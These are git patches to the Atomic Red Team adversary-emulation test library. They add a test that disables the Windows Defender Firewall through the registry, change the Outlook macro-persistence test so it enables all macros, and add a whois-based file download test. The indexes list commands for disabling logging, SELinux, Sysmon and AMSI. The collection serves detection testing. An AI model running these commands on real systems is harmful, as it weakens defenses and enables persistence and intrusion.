Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index cbe6e63b..f7877e90 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -186,10 +186,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell -defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 2c80658d..da7cfd0c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -501,10 +501,11 @@ - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #1: Disable firewall [linux] - Atomic Test #2: Disable Microsoft Defender Firewall [windows] - - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows] - - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows] - - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows] - - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows] + - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows] + - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows] + - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows] + - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows] + - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows] - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #1: Disable syslog [linux] - Atomic Test #2: Disable Cb Response [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 7bc31d02..5441311e 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -361,10 +361,11 @@ - Atomic Test #4: Clear Windows Audit Policy Config [windows] - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #2: Disable Microsoft Defender Firewall [windows] - - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows] - - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows] - - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows] - - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows] + - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows] + - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows] + - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows] + - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows] + - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows] - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #10: Unload Sysmon Filter Driver [windows] - Atomic Test #11: Uninstall Sysmon [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3e83219d..e4882d57 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -22379,6 +22379,23 @@ defense-evasion: ' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 +' + name: command_prompt + - name: Disable Microsoft Defender Firewall via Registry + auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 + description: | + Disables the Microsoft Defender Firewall for the public profile via registry + Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" + /v "EnableFirewall" /t REG_DWORD /d 0 /f + +' + cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" + /v "EnableFirewall" /t REG_DWORD /d 1 /f + ' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index ea17f6a6..3c2b9eea 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md @@ -10,13 +10,15 @@ Modifying or disabling a system firewall may enable adversary C2 communications, - [Atomic Test #2 - Disable Microsoft Defender Firewall](#atomic-test-2---disable-microsoft-defender-firewall) -- [Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall) +- [Atomic Test #3 - Disable Microsoft Defender Firewall via Registry](#atomic-test-3---disable-microsoft-defender-firewall-via-registry) -- [Atomic Test #4 - Opening ports for proxy - HARDRAIN](#atomic-test-4---opening-ports-for-proxy---hardrain) +- [Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-4---allow-smb-and-rdp-on-microsoft-defender-firewall) -- [Atomic Test #5 - Open a local port through Windows Firewall to any profile](#atomic-test-5---open-a-local-port-through-windows-firewall-to-any-profile) +- [Atomic Test #5 - Opening ports for proxy - HARDRAIN](#atomic-test-5---opening-ports-for-proxy---hardrain) -- [Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-6---allow-executable-through-firewall-located-in-non-standard-location) +- [Atomic Test #6 - Open a local port through Windows Firewall to any profile](#atomic-test-6---open-a-local-port-through-windows-firewall-to-any-profile) + +- [Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-7---allow-executable-through-firewall-located-in-non-standard-location)
@@ -84,7 +86,36 @@ netsh advfirewall set currentprofile state on >nul 2>&1

-## Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall +## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry +Disables the Microsoft Defender Firewall for the public profile via registry +Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f +``` + +#### Cleanup Commands: +```cmd +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f +``` + + + + + +
+
+ +## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services... @@ -114,7 +145,7 @@ netsh advfirewall reset >nul 2>&1

-## Atomic Test #4 - Opening ports for proxy - HARDRAIN +## Atomic Test #5 - Opening ports for proxy - HARDRAIN This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf @@ -144,7 +175,7 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp

-## Atomic Test #5 - Open a local port through Windows Firewall to any profile +## Atomic Test #6 - Open a local port through Windows Firewall to any profile This test will attempt to open a local port defined by input arguments to any profile **Supported Platforms:** Windows @@ -177,7 +208,7 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null

-## Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location +## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location This test will attempt to allow an executable through the system firewall located in the Users directory **Supported Platforms:** Windows From 799ea20a954ce926d8f23d06c507d213ccfa7aca Mon Sep 17 00:00:00 2001 From: BaffledJimmy Date: Wed, 16 Jun 2021 05:39:17 +0100 Subject: [PATCH 43/84] Amend regkey path for Macro security level (#1515) * Amend regkey path for Macro security level As shown in this image - https://www.mdsec.co.uk/wp-content/uploads/2020/11/image-2-768x191.png.webp - the correct regkey is \Level\. The existing ```reg add``` syntax will not create a Level value with a DWORD of 4 (disable all). Also changed the regkey to 1 (enable all macros without notif). ``` 4 = Disable all macros without notification 3 = Notifications for digitally signed macros, all other macros disabled 2 = Notifications for all macros 1 = Enable all Macros ``` * Update T1137.yaml * Update T1137.md --- atomics/T1137/T1137.md | 21 +++++++++++++++------ atomics/T1137/T1137.yaml | 4 ++-- 2 files changed, 17 insertions(+), 8 deletions(-) diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index a7660ba0..2a8fa0fc 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137)
Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. -A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, macros and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) ## Atomic Tests @@ -12,11 +12,20 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 + As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ -it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. -Too achieve this two things must happened on the syste +it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands in the user context. This transform Outlook into a C2 execution method. +To achieve this two things must happen on the system: - The macro security registry value must be set to '4' -- A file called VbaProject.OTM must be created in the Outlook Folder. +- A correctly formatted file called VbaProject.OTM must be created in the Outlook Folder. + +Note: There are a variety of options possible for the Macro security setting. These are: +``` +4 = Disable all macros without notification +3 = Notifications for digitally signed macros, all other macros disabled +2 = Notifications for all macros +1 = Enable all Macros +``` **Supported Platforms:** Windows @@ -28,14 +37,14 @@ Too achieve this two things must happened on the syste ```cmd -reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM ``` #### Cleanup Commands: ```cmd -reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f del %APPDATA%\Microsoft\Outlook\VbaProject.OTM ``` diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml index 138d40bc..238f7a5b 100644 --- a/atomics/T1137/T1137.yaml +++ b/atomics/T1137/T1137.yaml @@ -13,10 +13,10 @@ atomic_tests: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f del %APPDATA%\Microsoft\Outlook\VbaProject.OTM name: command_prompt From c7125ac30715087aadf46545f9d5bd377402fbe8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 04:39:47 +0000 Subject: [PATCH 44/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1137/T1137.md | 17 ++++------------- 2 files changed, 6 insertions(+), 15 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e4882d57..9d315073 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -42012,11 +42012,11 @@ persistence: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f del %APPDATA%\Microsoft\Outlook\VbaProject.OTM name: command_prompt T1137.001: diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index 2a8fa0fc..50c9c974 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137)
Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. -A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, macros and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) ## Atomic Tests @@ -12,20 +12,11 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 - As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ -it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands in the user context. This transform Outlook into a C2 execution method. -To achieve this two things must happen on the system: +it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. +Too achieve this two things must happened on the syste - The macro security registry value must be set to '4' -- A correctly formatted file called VbaProject.OTM must be created in the Outlook Folder. - -Note: There are a variety of options possible for the Macro security setting. These are: -``` -4 = Disable all macros without notification -3 = Notifications for digitally signed macros, all other macros disabled -2 = Notifications for all macros -1 = Enable all Macros -``` +- A file called VbaProject.OTM must be created in the Outlook Folder. **Supported Platforms:** Windows From 78bb39a82d7efc26887bc72eb26677b66fb87077 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 16 Jun 2021 15:08:05 +0000 Subject: [PATCH 45/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1105/T1105.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 36360c6d..c90158a6 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -336,6 +336,7 @@ atomic_tests: del %temp%\MpCmdRun.log >nul 2>&1 name: command_prompt - name: whois file download + auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab description: | Download a remote file using the whois utility diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 03f6048b..ba1c4cac 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -720,3 +720,4 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 d546a3d9-0be5-40c7-ad82-5a7d79e1b66b 812c3ab8-94b0-4698-a9bf-9420af23ce24 afedc8c4-038c-4d82-b3e5-623a95f8a612 +c99a829f-0bb8-4187-b2c6-d47d1df74cab From 1219378ebd1351f809bac9e07e420c9c6e53ff01 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 15:08:12 +0000 Subject: [PATCH 46/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-CSV/macos-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/linux-index.md | 1 + .../Indexes/Indexes-Markdown/macos-index.md | 1 + atomics/Indexes/index.yaml | 49 ++++++++++++++++++ atomics/T1105/T1105.md | 51 +++++++++++++++++++ 8 files changed, 106 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index a2bca221..b3f87204 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -848,6 +848,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt +command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index e3764d6d..0e0f2184 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -180,6 +180,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83 command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash +command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 335e60cf..b0eec59f 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -159,6 +159,7 @@ command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83 command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash +command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index da7cfd0c..c79dc4ab 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1547,6 +1547,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] + - Atomic Test #14: whois file download [linux, macos] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index bbbb7484..957af315 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -609,6 +609,7 @@ - Atomic Test #4: scp remote file copy (pull) [linux, macos] - Atomic Test #5: sftp remote file copy (push) [linux, macos] - Atomic Test #6: sftp remote file copy (pull) [linux, macos] + - Atomic Test #14: whois file download [linux, macos] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 9253adec..90552709 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -456,6 +456,7 @@ - Atomic Test #4: scp remote file copy (pull) [linux, macos] - Atomic Test #5: sftp remote file copy (push) [linux, macos] - Atomic Test #6: sftp remote file copy (pull) [linux, macos] + - Atomic Test #14: whois file download [linux, macos] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9d315073..e4991964 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -64644,6 +64644,55 @@ command-and-control: del #{local_path} >nul 2>&1 del %temp%\MpCmdRun.log >nul 2>&1 name: command_prompt + - name: whois file download + auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab + description: 'Download a remote file using the whois utility + +' + supported_platforms: + - linux + - macos + input_arguments: + remote_host: + description: Remote hostname or IP address + type: String + default: localhost + remote_port: + description: Remote port to connect to + type: Integer + default: 8443 + output_file: + description: Path of file to save output to + type: Path + default: "/tmp/T1105.whois.out" + query: + description: Query to send to remote server + type: String + default: Hello from Atomic Red Team test T1105 + timeout: + description: Timeout period before ending process (seconds) + type: Integer + default: 1 + dependencies: + - description: 'The whois and timeout commands must be present + +' + prereq_command: 'which whois && which timeout + +' + get_prereq_command: 'echo "Please install timeout and the whois package" + +' + executor: + name: sh + elevation_required: false + command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p + #{remote_port} "#{query}" > #{output_file} + +' + cleanup_command: 'rm -f #{output_file} + +' T1090.001: technique: external_references: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index fc154f30..342c71e0 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -30,6 +30,8 @@ - [Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe](#atomic-test-13---download-a-file-with-windows-defender-mpcmdrunexe) +- [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download) +
@@ -482,4 +484,53 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m +
+
+ +## Atomic Test #14 - whois file download +Download a remote file using the whois utility + +**Supported Platforms:** Linux, macOS + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| remote_host | Remote hostname or IP address | String | localhost| +| remote_port | Remote port to connect to | Integer | 8443| +| output_file | Path of file to save output to | Path | /tmp/T1105.whois.out| +| query | Query to send to remote server | String | Hello from Atomic Red Team test T1105| +| timeout | Timeout period before ending process (seconds) | Integer | 1| + + +#### Attack Commands: Run with `sh`! + + +```sh +timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} +``` + +#### Cleanup Commands: +```sh +rm -f #{output_file} +``` + + + +#### Dependencies: Run with `sh`! +##### Description: The whois and timeout commands must be present +##### Check Prereq Commands: +```sh +which whois && which timeout +``` +##### Get Prereq Commands: +```sh +echo "Please install timeout and the whois package" +``` + + + +
